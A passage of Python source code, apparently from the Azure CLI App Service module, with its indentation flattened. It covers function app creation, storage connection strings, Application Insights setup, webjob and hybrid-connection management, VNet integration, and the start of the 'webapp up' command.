site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise ValidationError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = bool(os_type and os_type.lower() == LINUX_OS_NAME)
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = bool(plan_info.reserved)
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise ValidationError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise ArgumentUsageError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime is None and runtime_version is not None:
raise ArgumentUsageError('Must specify --runtime to use --runtime-version')
runtime_helper = _FunctionAppStackRuntimeHelper(cmd, linux=is_linux, windows=(not is_linux))
matched_runtime = runtime_helper.resolve("dotnet" if not runtime else runtime,
runtime_version, functions_version, is_linux)
site_config_dict = matched_runtime.site_config_dict
app_settings_dict = matched_runtime.app_settings_dict
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_dict.use32_bit_worker_process = False
app_settings_dict = {}
# ensure that app insights is created if not disabled
matched_runtime.app_insights = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_dict.as_dict().items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_dict.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not matched_runtime.app_insights:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and matched_runtime.app_insights:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_tier(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot, client=client)
parsed_plan = parse_resource_id(app.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
app.virtual_network_subnet_id = subnet_info["subnet_resource_id"]
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot,
client=client, extra_parameter=app)
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == LINUX_OS_NAME
helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
if runtime and html:
raise MutuallyExclusiveArgumentError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime, _is_linux)
if not match:
raise ValidationError("{0} runtime '{1}' is not supported. Please check supported runtimes with: "
"'az webapp list-runtimes --os {0}'".format(os_name, runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html, is_linux=_is_linux)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language, helper, _is_linux)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise ValidationError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
